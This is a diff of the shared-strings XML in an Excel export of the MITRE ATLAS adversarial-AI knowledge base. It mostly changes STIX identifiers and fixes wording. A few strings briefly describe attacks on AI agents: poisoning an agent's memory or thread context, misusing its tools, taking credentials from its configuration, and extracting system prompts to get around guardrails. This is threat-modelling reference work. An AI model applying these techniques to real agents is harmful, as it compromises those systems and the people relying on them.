-    <t>attack-pattern--e6e9b7bc-f37b-4dea-a135-7bae180a616d</t>
-  </si>
-  <si>
-    <t>attack-pattern--1d4de99a-9620-40ab-a82f-da8b2436d97b</t>
-  </si>
-  <si>
-    <t>attack-pattern--678ba1d7-bb13-4074-89fc-19cb05375d56</t>
-  </si>
-  <si>
-    <t>attack-pattern--d4891783-2642-4210-b3e6-bd742979631f</t>
-  </si>
-  <si>
-    <t>attack-pattern--d9d06989-0df5-46ec-93f7-9640b6a6e631</t>
-  </si>
-  <si>
-    <t>attack-pattern--dca35ecd-dfe7-4e5c-8584-428c89ae59d4</t>
-  </si>
-  <si>
-    <t>attack-pattern--b3d3acc8-4ea1-49ae-9842-64578f6f9cfd</t>
-  </si>
-  <si>
-    <t>attack-pattern--5e3ede18-fa15-41f6-b900-c70befd558f9</t>
+    <t>attack-pattern--0912bcec-2c4f-4af7-abc6-a3c76ed9845d</t>
+  </si>
+  <si>
+    <t>attack-pattern--3e134aef-a2d3-44e7-9cf3-dd65306b7fd3</t>
+  </si>
+  <si>
+    <t>attack-pattern--176f4ecc-c4ab-43da-8f9e-6983aab7ba23</t>
+  </si>
+  <si>
+    <t>attack-pattern--f1f4f17b-fec1-471d-9d48-52d0009747cd</t>
+  </si>
+  <si>
+    <t>attack-pattern--5b6de841-d80e-4649-8472-73cd184d4fa1</t>
+  </si>
+  <si>
+    <t>attack-pattern--da47ea85-1495-4419-be39-937d4f9fccf3</t>
+  </si>
+  <si>
+    <t>attack-pattern--ca7df05b-6f48-4979-a3ed-5d58340aa2a2</t>
+  </si>
+  <si>
+    <t>attack-pattern--296d4b7d-fe9b-4e9f-ac78-69a001f6b94c</t>
+  </si>
+  <si>
+    <t>attack-pattern--63949113-3bdf-4bf9-8b97-bf88f6ea2b5d</t>
+  </si>
+  <si>
+    <t>attack-pattern--07cdfd57-21de-4ac0-8214-499ea2f213c1</t>
+  </si>
+  <si>
+    <t>attack-pattern--b919c30f-6089-464f-9d87-2e6077c968e8</t>
+  </si>
+  <si>
+    <t>attack-pattern--5b4aaa0e-a59b-4aef-9089-87153268f5a3</t>
+  </si>
+  <si>
+    <t>attack-pattern--c8acdcb8-478b-48df-b35b-9d479b7f8da6</t>
+  </si>
+  <si>
+    <t>attack-pattern--fb43eb43-aafb-485e-ba0b-7308dc640f8e</t>
+  </si>
+  <si>
+    <t>attack-pattern--59772559-b1f5-49a2-b4e4-3e5891dc47d1</t>
+  </si>
+  <si>
+    <t>attack-pattern--fa94cb54-025e-4cbd-8cf1-1edd48a15dcc</t>
+  </si>
+  <si>
+    <t>attack-pattern--a9133f08-daaa-4cab-a3e1-c39746e2c3e0</t>
+  </si>
+  <si>
+    <t>attack-pattern--4a0fd699-cadb-48ed-82dc-5cdf87e272e1</t>
+  </si>
+  <si>
+    <t>attack-pattern--c8c4fd4c-a574-429a-8d1f-3dd1dc014fd0</t>
+  </si>
+  <si>
+    <t>attack-pattern--324a3f50-7a4f-44e2-aa85-8fe279b7b8fd</t>
+  </si>
+  <si>
+    <t>attack-pattern--08b2f97a-9964-499b-8267-0e5d5c88293e</t>
+  </si>
+  <si>
+    <t>attack-pattern--b9cc4754-8b2c-435f-85f7-0ff3287a13d8</t>
+  </si>
+  <si>
+    <t>attack-pattern--8d58618c-2cfa-41d0-95ba-9973a5e10266</t>
+  </si>
+  <si>
+    <t>attack-pattern--148cfb49-1045-4bfe-a76e-8f2e955bf805</t>
+  </si>
+  <si>
+    <t>attack-pattern--af5092c6-0f01-47bc-81a7-b5780b4ee927</t>
+  </si>
+  <si>
+    <t>attack-pattern--2c52ac08-5431-4989-a714-56ad3d5f4c30</t>
+  </si>
+  <si>
+    <t>attack-pattern--5f7a292b-9d03-4d7d-a75d-51c48ec83359</t>
+  </si>
+  <si>
+    <t>attack-pattern--e14109b0-caed-4f22-a7cb-65d98a00d55c</t>
+  </si>
+  <si>
+    <t>attack-pattern--3bae2bf3-b18a-4c90-866e-22a0a5c6364e</t>
+  </si>
+  <si>
+    <t>attack-pattern--5edeb741-19a0-4c43-878b-af097a0d6d2c</t>
+  </si>
+  <si>
+    <t>attack-pattern--93cf6320-66fd-40ff-bb31-022d4678e991</t>
+  </si>
+  <si>
+    <t>attack-pattern--9d51d24e-2325-49b8-99c2-ec3e0759cbdd</t>
+  </si>
+  <si>
+    <t>attack-pattern--e3998e6c-f7c9-4b89-a8d2-afb00c48aea1</t>
+  </si>
+  <si>
+    <t>attack-pattern--041a9792-537b-4a7c-ad8a-e4d8adbb6f3c</t>
+  </si>
+  <si>
+    <t>attack-pattern--b5762e9b-10aa-4388-99dc-dd30222423ad</t>
+  </si>
+  <si>
+    <t>attack-pattern--89977385-7cbf-4c35-aa5f-3556d423b16f</t>
+  </si>
+  <si>
+    <t>attack-pattern--868cf923-8c03-4c1c-8ab9-7f5bbe4be354</t>
+  </si>
+  <si>
+    <t>attack-pattern--0b6afaf3-1c27-4dbc-9ac4-9728b06571ee</t>
+  </si>
+  <si>
+    <t>attack-pattern--29621dd4-0d45-4cef-956e-c94d46934874</t>
+  </si>
+  <si>
+    <t>attack-pattern--fe2aa670-46ff-4c8d-b47e-e924d9a7b44d</t>
+  </si>
+  <si>
+    <t>attack-pattern--a016c780-1be3-4962-9800-3e112816283c</t>
+  </si>
+  <si>
+    <t>attack-pattern--b3376b69-aa19-4644-9de3-e535e7a45214</t>
+  </si>
+  <si>
+    <t>attack-pattern--c7d9ba16-db33-4392-a92b-29775df8127e</t>
+  </si>
+  <si>
+    <t>attack-pattern--e4139803-8d69-4a01-a0d0-bd7fcf8293ec</t>
+  </si>
+  <si>
+    <t>attack-pattern--3349bf19-fc1f-4763-9eb0-4141cbb550cd</t>
+  </si>
+  <si>
+    <t>attack-pattern--2bf39f50-afad-459f-8c0e-d6773a1bda2b</t>
+  </si>
+  <si>
+    <t>attack-pattern--78dc8397-b8d3-4508-b7d7-de5eed2e0b34</t>
+  </si>
+  <si>
+    <t>attack-pattern--d276f052-7ca6-40c2-9b44-1bd8de0d9216</t>
+  </si>
+  <si>
+    <t>attack-pattern--b7f68362-d45a-4d2a-8641-c0cecc09b274</t>
+  </si>
+  <si>
+    <t>attack-pattern--6a7c645b-4b72-486d-a7ac-c5f92d994224</t>
+  </si>
+  <si>
+    <t>attack-pattern--633e83b9-7d27-4b3a-9f59-50cc8e60fa4e</t>
+  </si>
+  <si>
+    <t>attack-pattern--211afbd5-cb54-4712-9736-352b4d2af207</t>
+  </si>
+  <si>
+    <t>attack-pattern--fac3953d-1a76-41c2-b8fb-5335360f3a70</t>
+  </si>
+  <si>
+    <t>attack-pattern--92147a80-f17e-450e-907f-8ed496079a86</t>
+  </si>
+  <si>
+    <t>attack-pattern--b41c165d-9b71-4e7f-936e-13f6495d6c8f</t>
+  </si>
+  <si>
+    <t>attack-pattern--38a287f8-0695-4f34-af91-84a997f1384a</t>
+  </si>
+  <si>
+    <t>attack-pattern--75170956-8c65-4a9d-84cd-a390972a4ad8</t>
+  </si>
+  <si>
+    <t>attack-pattern--97c9fae3-b20b-4f07-8f54-28fde4aed8d9</t>
+  </si>
+  <si>
+    <t>attack-pattern--eea60636-03ca-4806-b0fc-efd93e943629</t>
+  </si>
+  <si>
+    <t>attack-pattern--b3d87887-9db8-4dc4-a03e-f89493ed17ad</t>
+  </si>
+  <si>
+    <t>attack-pattern--724b0528-6716-415e-8b32-023982f41b65</t>
+  </si>
+  <si>
+    <t>attack-pattern--047a52ef-ed5f-4807-95e8-90c48db70911</t>
+  </si>
+  <si>
+    <t>attack-pattern--2ab8f666-b644-4a59-8422-ee17ffe2d966</t>
+  </si>
+  <si>
+    <t>attack-pattern--2d88f847-1507-475c-ad16-448673303a8d</t>
+  </si>
+  <si>
+    <t>attack-pattern--afb54222-e4ab-4f9a-af08-8410816ed85e</t>
+  </si>
+  <si>
+    <t>attack-pattern--2ab2242e-f52d-42a1-9b5c-487d56e6130a</t>
+  </si>
+  <si>
+    <t>attack-pattern--e055148e-b7d9-44eb-97b8-8e1147fa945d</t>
+  </si>
+  <si>
+    <t>attack-pattern--82440a8e-09d7-445d-a120-8186984dc25f</t>
+  </si>
+  <si>
+    <t>attack-pattern--60c58536-0a04-4468-9e15-703b2d65e516</t>
+  </si>
+  <si>
+    <t>attack-pattern--682b745d-b6a3-476c-a4ff-6165492e20da</t>
+  </si>
+  <si>
+    <t>attack-pattern--68948a16-1aa4-4b26-a479-5fc24403e9e1</t>
+  </si>
+  <si>
+    <t>attack-pattern--10f4a431-2663-498f-bef9-2de43f4d733d</t>
+  </si>
+  <si>
+    <t>attack-pattern--650ab043-58e9-4765-9d89-8410f7706b37</t>
+  </si>
+  <si>
+    <t>attack-pattern--0c92231b-f3fe-4da0-ba24-f3d7243f9be7</t>
+  </si>
+  <si>
+    <t>attack-pattern--9bfb5ad8-b0d2-4a4e-850b-1533b9aaded4</t>
+  </si>
+  <si>
+    <t>attack-pattern--1eeb1415-94d5-4b4f-80ac-5cb949a25412</t>
+  </si>
+  <si>
+    <t>attack-pattern--053e0bc4-eb19-4a9c-945f-5914557ef1ee</t>
+  </si>
+  <si>
+    <t>attack-pattern--e3ce6dc6-7e12-449d-9c73-7cac156023e7</t>
+  </si>
+  <si>
+    <t>attack-pattern--b17d49ce-5d00-4dd1-adc3-fce5a3c8888d</t>
+  </si>
+  <si>
+    <t>attack-pattern--56bc1ef0-2adb-4d1e-b9fa-2555c67eba28</t>
+  </si>
+  <si>
+    <t>attack-pattern--29704c6c-04ee-4d3f-9fed-026e011b808e</t>
+  </si>
+  <si>
+    <t>attack-pattern--13c08a15-bb61-4ac5-88f9-bf83e2c6e8f1</t>
+  </si>
+  <si>
+    <t>attack-pattern--6cb15293-c301-41be-9514-59c2d145daaa</t>
+  </si>
+  <si>
+    <t>attack-pattern--75f4b6e6-2c1a-489a-9819-a46b08dece0b</t>
+  </si>
+  <si>
+    <t>attack-pattern--a733a4be-72af-44fd-8863-2a45c2de187b</t>
+  </si>
+  <si>
+    <t>attack-pattern--f4eaeff7-1307-4da2-bdf7-5c94703de244</t>
+  </si>
+  <si>
+    <t>attack-pattern--77727d6d-ec87-4c1c-a8be-9252e061fcc3</t>
+  </si>
+  <si>
+    <t>attack-pattern--6b5b7d7d-fdf9-4254-a2ae-c3475619fd0e</t>
+  </si>
+  <si>
+    <t>attack-pattern--8f25f9f4-2c76-472c-a353-777b8ccaa28a</t>
+  </si>
+  <si>
+    <t>attack-pattern--a26b7874-88c5-46c0-b5ac-d93ac3739fe6</t>
+  </si>
+  <si>
+    <t>attack-pattern--d024ba77-7c46-44fa-81dc-35376664d66f</t>
+  </si>
+  <si>
+    <t>attack-pattern--b6798c32-1cb0-4fff-9ca7-5b340676d3bd</t>
+  </si>
+  <si>
+    <t>attack-pattern--02573874-564d-405f-b9ea-d5299cd6a770</t>
+  </si>
+  <si>
+    <t>attack-pattern--82e496fa-4573-4974-9dcd-4bf1d4f2766a</t>
+  </si>
+  <si>
+    <t>attack-pattern--a1da447c-e908-4b99-b8be-45d0039e4eb5</t>
+  </si>
+  <si>
+    <t>attack-pattern--7187fe3d-e183-4dd9-a67c-e2be1cd7de1a</t>
+  </si>
+  <si>
+    <t>attack-pattern--023c1e52-ad3a-4991-9f0b-eef64fbfc503</t>
+  </si>
+  <si>
+    <t>attack-pattern--b64006d0-780e-45a1-ac8c-b5a80860267a</t>
+  </si>
+  <si>
+    <t>attack-pattern--5bf3c7e5-0566-4e9b-9dde-2df306555440</t>
+  </si>
+  <si>
+    <t>attack-pattern--5375bdef-23a1-4a72-bcf3-4e1b9b5bb323</t>
+  </si>
+  <si>
+    <t>attack-pattern--261276a5-b434-43ee-9d63-e1c6967d0769</t>
+  </si>
+  <si>
+    <t>attack-pattern--13895978-e8ed-47d2-af57-4e8522047dee</t>
+  </si>
+  <si>
+    <t>attack-pattern--865eec6c-0065-4df4-bfa7-3b6d0e5f3545</t>
+  </si>
+  <si>
+    <t>attack-pattern--ab26383f-c974-4ea2-9e1b-8b9236760489</t>
+  </si>
+  <si>
+    <t>attack-pattern--aa3a3203-adf2-4a34-b67a-08d31e3131c4</t>
+  </si>
+  <si>
+    <t>attack-pattern--8ed6d88d-79c6-48f5-a863-3d960d9a192c</t>
+  </si>
+  <si>
+    <t>attack-pattern--fed00fd1-986f-4962-a4d2-3ea7168ec7e8</t>
+  </si>
+  <si>
+    <t>attack-pattern--862d82d3-ad1a-4fcf-ad92-8b84b7204b5b</t>
+  </si>
+  <si>
+    <t>attack-pattern--2b52830c-388d-42bd-a945-bd9bdc78bf5d</t>
+  </si>
+  <si>
+    <t>attack-pattern--a7333d62-87fe-42a2-b508-28efb82fd79d</t>
+  </si>
+  <si>
+    <t>attack-pattern--d262dc2e-8e6b-46dd-b0f0-c79d64577fe8</t>
+  </si>
+  <si>
+    <t>attack-pattern--819e6107-3d92-43be-8e28-8e38c08ce9f9</t>
+  </si>
+  <si>
+    <t>attack-pattern--25865b84-354b-4f43-a41f-3fa5cc159253</t>
+  </si>
+  <si>
+    <t>attack-pattern--dcc027c8-8a51-4d03-8d4c-41d5ae6cb83b</t>
+  </si>
+  <si>
+    <t>attack-pattern--6ace3735-3c47-4a37-833f-9d8fc26ce0c4</t>
+  </si>
+  <si>
+    <t>attack-pattern--282c9e6f-42f0-43f7-950e-18fa7f313ed0</t>
+  </si>
+  <si>
+    <t>attack-pattern--d0d06b7c-f920-4da1-8a0e-d4289e312c54</t>
+  </si>
+  <si>
+    <t>attack-pattern--de4823e0-f55c-49c6-90fc-e91bbc0e34d2</t>
+  </si>
+  <si>
+    <t>attack-pattern--3e1f7c25-d154-4f03-a374-15ddd7ce6eb4</t>
+  </si>
+  <si>
+    <t>attack-pattern--43236365-129e-4376-aa33-aaca5282e9b3</t>
+  </si>
+  <si>
+    <t>attack-pattern--7fb874e9-a690-4696-ad74-69234fa9ace5</t>
+  </si>
+  <si>
+    <t>attack-pattern--f39f54cc-6d52-4fc8-9546-5f426890a128</t>
+  </si>
+  <si>
+    <t>attack-pattern--476c43ad-1a16-4a38-9109-22dad22cc998</t>
+  </si>
+  <si>
+    <t>attack-pattern--2cfaa250-11b0-4451-bf5d-f2628036c79a</t>
+  </si>
+  <si>
+    <t>attack-pattern--27317dc5-37f1-458c-8c7c-f574ea8ece83</t>
+  </si>
+  <si>
+    <t>attack-pattern--3dec1e87-8cd0-4a71-977b-cb182ca4434f</t>
+  </si>
+  <si>
+    <t>attack-pattern--254fbfe8-c7d6-41e3-a81b-d49da083f1aa</t>
+  </si>
+  <si>
+    <t>attack-pattern--3b4da875-1cff-4405-85aa-f8488a5a5b79</t>
+  </si>
+  <si>
+    <t>attack-pattern--2a01b6d6-2efe-41f8-a8fe-15982adf21a4</t>
+  </si>
+  <si>
+    <t>attack-pattern--7c2776a4-292a-43a3-9f1f-55b743c3cdb3</t>
   </si>
   <si>
     <t>AI Agent Context Poisoning</t>
@@ -1217,7 +1217,7 @@
   </si>
   <si>
     <t>Adversaries may attempt to manipulate the context used by an AI agent's large language model (LLM) to influence the responses it generates or actions it takes. This allows an adversary to persistently change the behavior of the target agent and further their goals.
-Context poisoning can be accomplished by prompting the an LLM to add instructions or preferences to memory (See Memory) or by simply prompting an LLM that uses prior messages in a thread as part of its context (See [Thread](/techniques/AML.T0080.001)).</t>
+Context poisoning can be accomplished by prompting the an LLM to add instructions or preferences to memory (See [Memory](/techniques/AML.T0080.000)) or by simply prompting an LLM that uses prior messages in a thread as part of its context (See [Thread](/techniques/AML.T0080.001)).</t>
   </si>
   <si>
     <t>Adversaries may use their access to an AI agent to invoke tools the agent has access to. LLMs are often connected to other services or resources via tools to increase their capabilities. Tools may include integrations with other applications, access to public or private data sources, and the ability to execute code.
@@ -1364,7 +1364,7 @@
 </t>
   </si>
   <si>
-    <t>Adversaries may access the credentials of other tools or services on a system from the configuration of an AI agent. AI agents often utilize external tools or services to take actions.
+    <t>Adversaries may access the credentials of other tools or services on a system from the configuration of an AI agent.
 AI Agents often utilize external tools or services to take actions, such as querying databases, invoking APIs, or interacting with cloud resources. To enable these functions, credentials like API keys, tokens, and connection strings are frequently stored in configuration files. While there are secure methods such as dedicated secret managers or encrypted vaults that can be deployed to store and manage these credentials, in practice they are often placed in less protected locations for convenience or ease of deployment. If an attacker can read or extract these configurations, they may obtain valid credentials that allow direct access to sensitive systems outside the agent itself.</t>
   </si>
   <si>
@@ -1741,7 +1741,7 @@
   <si>
     <t>Adversaries may search open application repositories during targeting.
 Examples of these include Google Play, the iOS App store, the macOS App Store, and the Microsoft Store.
-Adversaries may craft search queries seeking applications that contain a AI-enabled components.
+Adversaries may craft search queries seeking applications that contain AI-enabled components.
 Frequently, the next step is to [Acquire Public AI Artifacts](/techniques/AML.T0002).</t>
   </si>
   <si>
@@ -1805,7 +1805,7 @@
     <t>Adversaries may discover a large language model's system instructions provided by the AI system builder to learn about the system's capabilities and circumvent its guardrails.</t>
   </si>
   <si>
-    <t>Research labs at academic institutions and Company R&amp;D divisions often have blogs that highlight their use of artificial intelligence and its application to the organizations unique problems.
+    <t>Research labs at academic institutions and company R&amp;D divisions often have blogs that highlight their use of artificial intelligence and its application to the organization's unique problems.
 Individual researchers also frequently document their work in blogposts.
 An adversary may search for posts made by the target victim organization or its employees.
 In comparison to [Journals and Conference Proceedings](/techniques/AML.T0000.000) and [Pre-Print Repositories](/techniques/AML.T0000.001) this material will often contain more practical aspects of the AI system.
@@ -2272,7 +2272,7 @@
     <t>https://atlas.mitre.org/techniques/AML.T0043.000</t>
   </si>
   <si>
-    <t>29 September 2025</t>
+    <t>14 October 2025</t>
   </si>
   <si>
     <t>Persistence</t>
@@ -2380,49 +2380,49 @@
     <t>AML.TA0003</t>
   </si>
   <si>
-    <t>x-mitre-tactic--5c49a1dd-5474-4311-8404-aad0b56181c0</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--e63eb35a-2d6d-4030-8d5e-324e932685fa</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--c74fa1fc-c62e-44e6-b9d7-4ebf56c1d20f</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--006e2a73-f81a-418d-a041-fc2b49dd23d7</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--0e6771bc-4419-47f9-8360-ba8f5717be49</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--4af500bc-665b-4d94-a1e8-5307cb51c8b4</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--8182f174-1c32-4808-9cd3-daad9eaa2738</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--aff250a6-7df5-4668-a6ad-e0dc0c06cc58</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--5eea0386-d5f1-461d-ae46-e28746af5404</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--de9f7ce6-b0e8-4e41-bb8c-2192112180ec</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--27fc1ed4-f4c4-4d3e-9977-3502218744f2</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--de87bf3d-cbd2-4861-a7fd-17c3ff2d3c30</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--038bd769-e805-47fd-a065-c3430b8de30b</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--983578ee-75d0-4745-a0d8-875b9219d240</t>
-  </si>
-  <si>
-    <t>x-mitre-tactic--385bacea-c682-4391-aab0-9ac0525c9866</t>
+    <t>x-mitre-tactic--3d648b3b-c609-4498-9ccb-16dd92b60091</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--752d1bc1-97de-477d-bf60-1d6eef797fa8</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--3949dfa9-6172-4c97-9ced-624c184e936a</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--b5c5cf31-bd9d-40dc-b673-f261ed48b204</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--8bcf6ab3-0b9f-45da-9e46-be41577ce725</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--c8995d92-8f23-48cd-84da-b576a1dd50d9</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--98c004ae-ea40-4179-bd26-c61102a6e60c</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--071ddd01-4a5f-44d3-9d29-07232cc32630</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--ce033093-71eb-4009-954d-e56200e0de0b</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--ae6ffd21-ff6f-444e-9c67-582f19ff8205</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--42040456-663d-41f0-a84d-7d6c69210733</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--19343568-5860-4816-8c91-9639b9cbb197</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--e1a03122-79b9-4440-8214-ab53b0f944d8</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--044fbb79-dd83-40e9-abe0-f78e23325e92</t>
+  </si>
+  <si>
+    <t>x-mitre-tactic--8d99d2d9-2cfd-4645-9ebe-46532a9c5eba</t>
   </si>
   <si>
     <t>Privilege Escalation</t>
@@ -2439,7 +2439,7 @@
 AI Model Access enables techniques that use various types of access to the AI model that can be used by the adversary to gain information, develop attacks, and as a means to input data to the model.
 The level of access can range from the full knowledge of the internals of the model to access to the physical environment where data is collected for use in the AI model.
 The adversary may use varying levels of model access during the course of their attack, from staging the attack to impacting the target system.
-Access to an AI model may require access to the system housing the model, the model may be publically accessible via an API, or it may be accessed indirectly via interaction with a product or service that utilizes AI as part of its processes.</t>
+Access to an AI model may require access to the system housing the model, the model may be publicly accessible via an API, or it may be accessed indirectly via interaction with a product or service that utilizes AI as part of its processes.</t>
   </si>
   <si>
     <t>The adversary is trying to gather AI artifacts and other related information relevant to their goal.
@@ -2648,82 +2648,82 @@
     <t>AML.M0016</t>
   </si>
   <si>
-    <t>course-of-action--51df827f-516e-4c39-b145-76b81299ec52</t>
-  </si>
-  <si>
-    <t>course-of-action--b5ef966a-63d6-42dd-ad9f-815517a04e8f</t>
-  </si>
-  <si>
-    <t>course-of-action--65d103b8-03fa-486e-a763-ee0166095508</t>
-  </si>
-  <si>
-    <t>course-of-action--c2fed5ee-3e46-4465-a124-bce368826b7e</t>
-  </si>
-  <si>
-    <t>course-of-action--716c79ec-309d-46f6-a8ec-0d8361e34e58</t>
-  </si>
-  <si>
-    <t>course-of-action--784c2fb0-5a3d-43b3-b881-d56fb24ad51c</t>
-  </si>
-  <si>
-    <t>course-of-action--cf7a9fd6-f23d-4f9b-9a98-1c047aada908</t>
-  </si>
-  <si>
-    <t>course-of-action--08498ebf-daea-4c8f-be90-f976b408fc88</t>
-  </si>
-  <si>
-    <t>course-of-action--fbb1e321-c0b8-402a-a911-ea456ce99b34</t>
-  </si>
-  <si>
-    <t>course-of-action--bdc27f02-8925-46b5-b602-a3fd288c8e68</t>
-  </si>
-  <si>
-    <t>course-of-action--b304e8ce-46d3-4d1b-b849-9e9252cd7ad4</t>
-  </si>
-  <si>
-    <t>course-of-action--e8c1e0e9-833a-4d82-ab1d-c85571d6700e</t>
-  </si>
-  <si>
-    <t>course-of-action--41790108-f5a6-4a4c-960e-6aad7c6400ad</t>
-  </si>
-  <si>
-    <t>course-of-action--77b0693c-f61f-434e-9a9d-95c7b0ecea6f</t>
-  </si>
-  <si>
-    <t>course-of-action--f4ff76ff-2534-40a2-b787-b6b1b29a0273</t>
-  </si>
-  <si>
-    <t>course-of-action--b401966e-0f8d-47fa-a9c8-b3e203bb9b3c</t>
-  </si>
-  <si>
-    <t>course-of-action--c72d54b4-ece7-4043-b515-391145836b68</t>
-  </si>
-  <si>
-    <t>course-of-action--ab49fe8d-a63c-49ef-b8eb-e670a3d1e98e</t>
-  </si>
-  <si>
-    <t>course-of-action--664c2d35-9090-4322-b8d6-e056e8325573</t>
-  </si>
-  <si>
-    <t>course-of-action--05f1c700-7468-4398-82a4-30e2a9913c3f</t>
-  </si>
-  <si>
-    <t>course-of-action--b6235cea-ce60-41da-827f-fcb75aa006b0</t>
-  </si>
-  <si>
-    <t>course-of-action--60684533-200a-44a8-926b-69f304b25bc4</t>
-  </si>
-  <si>
-    <t>course-of-action--6e25b8c1-c7f9-44de-977b-c37568d83e02</t>
-  </si>
-  <si>
-    <t>course-of-action--2a7461ae-c975-46a4-bfe1-42bc8719510a</t>
-  </si>
-  <si>
-    <t>course-of-action--0b60e7b4-e979-41ca-b10d-7e732b58f472</t>
-  </si>
-  <si>
-    <t>course-of-action--47dd59e6-a681-4899-b308-a1e20ea60d81</t>
+    <t>course-of-action--dd3aa631-4640-4ea8-b630-3dd4588beea2</t>
+  </si>
+  <si>
+    <t>course-of-action--7ddd1f7d-1f39-4efd-97ce-2a0577b9d967</t>
+  </si>
+  <si>
+    <t>course-of-action--02fba334-0ac7-4005-bf1e-4815788a2a97</t>
+  </si>
+  <si>
+    <t>course-of-action--ef50cc5e-4cdd-483d-83a7-feae98e63a59</t>
+  </si>
+  <si>
+    <t>course-of-action--0c640f67-3d2c-4967-9975-ab0b80eb9330</t>
+  </si>
+  <si>
+    <t>course-of-action--ce135f7f-9edf-4942-a804-9478173dfeba</t>
+  </si>
+  <si>
+    <t>course-of-action--aed8bf3d-fca8-4aec-a25f-44143f4e4ac3</t>
+  </si>
+  <si>
+    <t>course-of-action--b263053e-cd0a-4502-8b33-50f9070d49a3</t>
+  </si>
+  <si>
+    <t>course-of-action--b0f8611d-5802-42ab-864b-2470ffcd6d28</t>
+  </si>
+  <si>
+    <t>course-of-action--0ce9c1dd-593d-4f87-a526-1cae567bc902</t>
+  </si>
+  <si>
+    <t>course-of-action--3dd5c016-2590-4bf3-a014-e8ad56ec8429</t>
+  </si>
+  <si>
+    <t>course-of-action--6d88c859-0afa-4bf9-852d-5297273a41c7</t>
+  </si>
+  <si>
+    <t>course-of-action--3d9c49c8-153c-4f28-af3f-8da9bc53aff6</t>
+  </si>
+  <si>
+    <t>course-of-action--267a1957-3eeb-456e-b20c-8bfc4203c25e</t>
+  </si>
+  <si>
+    <t>course-of-action--6b8233eb-5491-4faf-9de6-4b52d096e3c7</t>
+  </si>
+  <si>
+    <t>course-of-action--c18258e4-7399-4e2a-8d6e-e9a841b51111</t>
+  </si>
+  <si>
+    <t>course-of-action--3a3e11fa-b453-4d13-9117-3ec2b79c02fe</t>
+  </si>
+  <si>
+    <t>course-of-action--ded500ba-507c-4846-956e-e6e8e26bb16c</t>
+  </si>
+  <si>
+    <t>course-of-action--e24214b3-1a11-4597-b4e0-d410f1d90754</t>
+  </si>
+  <si>
+    <t>course-of-action--87fc5780-6b5f-4c93-a4a7-bb928f36478b</t>
+  </si>
+  <si>
+    <t>course-of-action--482dddc6-c06d-4902-b567-a765851c6b63</t>
+  </si>
+  <si>
+    <t>course-of-action--ee7a3c90-4624-4508-86b2-5995c131e852</t>
+  </si>
+  <si>
+    <t>course-of-action--71e80285-9441-4c34-89ff-3c5d279efa74</t>
+  </si>
+  <si>
+    <t>course-of-action--603fba78-8bfd-4fba-a551-c76394590135</t>
+  </si>
+  <si>
+    <t>course-of-action--bd9f1b3e-c8ee-4b5a-8d8d-d78fb4ca5ed7</t>
+  </si>
+  <si>
+    <t>course-of-action--0118178b-98d8-48b4-b9e7-7da0f55e073c</t>
   </si>
   <si>
     <t>AI Bill of Materials</t>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1663" uniqueCount="872">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1814" uniqueCount="958">
   <si>
     <t>ID</t>
   </si>
@@ -94,6 +94,9 @@
     <t>AML.T0017.000</t>
   </si>
   <si>
+    <t>AML.T0091.000</t>
+  </si>
+  <si>
     <t>AML.T0043.001</t>
   </si>
   <si>
@@ -145,6 +148,9 @@
     <t>AML.T0002.000</t>
   </si>
   <si>
+    <t>AML.T0094</t>
+  </si>
+  <si>
     <t>AML.T0029</t>
   </si>
   <si>
@@ -232,6 +238,12 @@
     <t>AML.T0064</t>
   </si>
   <si>
+    <t>AML.T0087</t>
+  </si>
+  <si>
+    <t>AML.T0088</t>
+  </si>
+  <si>
     <t>AML.T0016.002</t>
   </si>
   <si>
@@ -286,6 +298,9 @@
     <t>AML.T0018</t>
   </si>
   <si>
+    <t>AML.T0092</t>
+  </si>
+  <si>
     <t>AML.T0043.003</t>
   </si>
   <si>
@@ -307,6 +322,9 @@
     <t>AML.T0018.001</t>
   </si>
   <si>
+    <t>AML.T0090</t>
+  </si>
+  <si>
     <t>AML.T0016</t>
   </si>
   <si>
@@ -328,6 +346,12 @@
     <t>AML.T0000.001</t>
   </si>
   <si>
+    <t>AML.T0089</t>
+  </si>
+  <si>
+    <t>AML.T0093</t>
+  </si>
+  <si>
     <t>AML.T0060</t>
   </si>
   <si>
@@ -364,6 +388,9 @@
     <t>AML.T0000</t>
   </si>
   <si>
+    <t>AML.T0095</t>
+  </si>
+  <si>
     <t>AML.T0003</t>
   </si>
   <si>
@@ -418,6 +445,9 @@
     <t>AML.T0055</t>
   </si>
   <si>
+    <t>AML.T0091</t>
+  </si>
+  <si>
     <t>AML.T0005.002</t>
   </si>
   <si>
@@ -436,394 +466,424 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--0912bcec-2c4f-4af7-abc6-a3c76ed9845d</t>
-  </si>
-  <si>
-    <t>attack-pattern--3e134aef-a2d3-44e7-9cf3-dd65306b7fd3</t>
-  </si>
-  <si>
-    <t>attack-pattern--176f4ecc-c4ab-43da-8f9e-6983aab7ba23</t>
-  </si>
